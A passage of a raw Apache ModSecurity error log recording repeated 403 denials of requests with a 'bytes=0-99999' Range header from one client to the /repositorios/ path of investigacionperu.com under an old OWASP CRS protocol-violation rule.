17 10:35:36.184891 2025] [:error] [pid 11230:tid 140634274920192] [client 190.102.150.245:36184] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSKvoDupyaoF2tAuccQAAAME"] [Mon Feb 17 10:35:36.281257 2025] [:error] [pid 11230:tid 140634098673408] [client 190.102.150.245:36186] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSKvoDupyaoF2tAuccgAAANY"] [Mon Feb 17 10:35:36.377648 2025] [:error] [pid 11230:tid 140634224563968] [client 190.102.150.245:36188] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSKvoDupyaoF2tAuccwAAAMc"] [Mon Feb 17 10:35:36.473835 2025] [:error] [pid 11230:tid 140634090280704] [client 190.102.150.245:36190] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSKvoDupyaoF2tAucdAAAANc"] [Mon Feb 17 10:35:36.569850 2025] [:error] [pid 11230:tid 140634241349376] [client 190.102.150.245:36192] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSKvoDupyaoF2tAucdQAAAMU"] [Mon Feb 17 10:35:36.666412 2025] [:error] [pid 11230:tid 140634266527488] [client 190.102.150.245:36194] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSKvoDupyaoF2tAucdgAAAMI"] [Mon Feb 17 10:35:36.763657 2025] [:error] [pid 11230:tid 140634174207744] [client 190.102.150.245:36196] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSKvoDupyaoF2tAucdwAAAM0"] [Mon Feb 17 10:35:36.860792 2025] [:error] [pid 11230:tid 140634207778560] [client 190.102.150.245:36198] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSKvoDupyaoF2tAuceAAAAMk"] [Mon Feb 17 10:35:36.958434 2025] [:error] [pid 11230:tid 140634107066112] [client 190.102.150.245:36200] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSKvoDupyaoF2tAuceQAAANU"] [Mon Feb 17 10:35:37.059925 2025] [:error] [pid 10663:tid 140634081888000] [client 190.102.150.245:36202] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSbUcx1xj5z0EGUpRhgAAAFg"] [Mon Feb 17 10:35:37.157344 2025] [:error] [pid 10663:tid 140634107066112] [client 190.102.150.245:36204] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSbUcx1xj5z0EGUpRhwAAAFU"] [Mon Feb 17 10:35:37.254182 2025] [:error] [pid 10663:tid 140634266527488] [client 190.102.150.245:36206] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSbUcx1xj5z0EGUpRiAAAAEI"] [Mon Feb 17 10:35:37.350284 2025] [:error] [pid 11230:tid 140634190993152] [client 190.102.150.245:36208] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSavoDupyaoF2tAucegAAAMs"] [Mon Feb 17 10:35:37.447788 2025] [:error] [pid 11230:tid 140634081888000] [client 190.102.150.245:36210] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSavoDupyaoF2tAucewAAANg"] [Mon Feb 17 10:35:37.545120 2025] [:error] [pid 11230:tid 140634232956672] [client 190.102.150.245:36212] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSavoDupyaoF2tAucfAAAAMY"] [Mon Feb 17 10:35:37.641431 2025] [:error] [pid 11230:tid 140634258134784] [client 190.102.150.245:36214] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSavoDupyaoF2tAucfQAAAMM"] [Mon Feb 17 10:35:37.737397 2025] [:error] [pid 10664:tid 140634174207744] [client 190.102.150.245:36216] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSQJrayd7JfpBdXs7pQAAAI0"] [Mon Feb 17 10:35:37.833472 2025] [:error] [pid 11230:tid 140634115458816] [client 190.102.150.245:36218] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSavoDupyaoF2tAucfgAAANQ"] [Mon Feb 17 10:35:37.930390 2025] [:error] [pid 11230:tid 140634132244224] [client 190.102.150.245:36220] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSavoDupyaoF2tAucfwAAANI"] [Mon Feb 17 10:35:38.028104 2025] [:error] [pid 10664:tid 140634140636928] [client 190.102.150.245:36222] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSgJrayd7JfpBdXs7pgAAAJE"] [Mon Feb 17 10:35:38.125111 2025] [:error] [pid 11230:tid 140634274920192] [client 190.102.150.245:36224] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSqvoDupyaoF2tAucgAAAAME"] [Mon Feb 17 10:35:38.221195 2025] [:error] [pid 11230:tid 140634098673408] [client 190.102.150.245:36226] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSqvoDupyaoF2tAucgQAAANY"] [Mon Feb 17 10:35:38.318597 2025] [:error] [pid 11230:tid 140634157422336] [client 190.102.150.245:36228] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSqvoDupyaoF2tAucggAAAM8"] [Mon Feb 17 10:35:38.415424 2025] [:error] [pid 11230:tid 140634224563968] [client 190.102.150.245:36230] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSqvoDupyaoF2tAucgwAAAMc"] [Mon Feb 17 10:35:38.515007 2025] [:error] [pid 11230:tid 140634216171264] [client 190.102.150.245:36232] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSqvoDupyaoF2tAuchAAAAMg"] [Mon Feb 17 10:35:38.612546 2025] [:error] [pid 11230:tid 140634241349376] [client 190.102.150.245:36234] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSqvoDupyaoF2tAuchQAAAMU"] [Mon Feb 17 10:35:38.710144 2025] [:error] [pid 11230:tid 140634266527488] [client 190.102.150.245:36236] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSqvoDupyaoF2tAuchgAAAMI"] [Mon Feb 17 10:35:38.806239 2025] [:error] [pid 11230:tid 140634199385856] [client 190.102.150.245:36238] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSqvoDupyaoF2tAuchwAAAMo"] [Mon Feb 17 10:35:38.905235 2025] [:error] [pid 10664:tid 140634107066112] [client 190.102.150.245:36240] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSgJrayd7JfpBdXs7pwAAAJU"] [Mon Feb 17 10:35:39.001191 2025] [:error] [pid 11230:tid 140634182600448] [client 190.102.150.245:36242] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXS6voDupyaoF2tAuciAAAAMw"] [Mon Feb 17 10:35:39.098792 2025] [:error] [pid 11230:tid 140634207778560] [client 190.102.150.245:36244] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXS6voDupyaoF2tAuciQAAAMk"] [Mon Feb 17 10:35:39.194991 2025] [:error] [pid 11230:tid 140634107066112] [client 190.102.150.245:36246] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXS6voDupyaoF2tAucigAAANU"] [Mon Feb 17 10:35:39.291713 2025] [:error] [pid 11230:tid 140634190993152] [client 190.102.150.245:36248] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXS6voDupyaoF2tAuciwAAAMs"] [Mon Feb 17 10:35:39.387756 2025] [:error] [pid 11230:tid 140634081888000] [client 190.102.150.245:36250] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXS6voDupyaoF2tAucjAAAANg"] [Mon Feb 17 10:35:39.484507 2025] [:error] [pid 10662:tid 140634157422336] [client 190.102.150.245:36252] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXS__97XY8xax64gWTkQAAAA8"] [Mon Feb 17 10:35:39.581189 2025] [:error] [pid 10664:tid 140634149029632] [client 190.102.150.245:36254] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSwJrayd7JfpBdXs7qAAAAJA"] [Mon Feb 17 10:35:39.677780 2025] [:error] [pid 10664:tid 140634115458816] [client 190.102.150.245:36256] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSwJrayd7JfpBdXs7qQAAAJQ"] [Mon Feb 17 10:35:39.774871 2025] [:error] [pid 10662:tid 140634216171264] [client 190.102.150.245:36258] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXS__97XY8xax64gWTkgAAAAg"] [Mon Feb 17 10:35:39.871289 2025] [:error] [pid 10663:tid 140634258134784] [client 190.102.150.245:36260] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXS7Ucx1xj5z0EGUpRiQAAAEM"] [Mon Feb 17 10:35:39.967416 2025] [:error] [pid 10663:tid 140634274920192] [client 190.102.150.245:36262] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXS7Ucx1xj5z0EGUpRigAAAEE"] [Mon Feb 17 10:35:40.064754 2025] [:error] [pid 11230:tid 140634123851520] [client 190.102.150.245:36264] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXTKvoDupyaoF2tAucjQAAANM"] [Mon Feb 17 10:35:40.162536 2025] [:error] [pid 10664:tid 140634249742080] [client 190.102.150.245:36266] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match 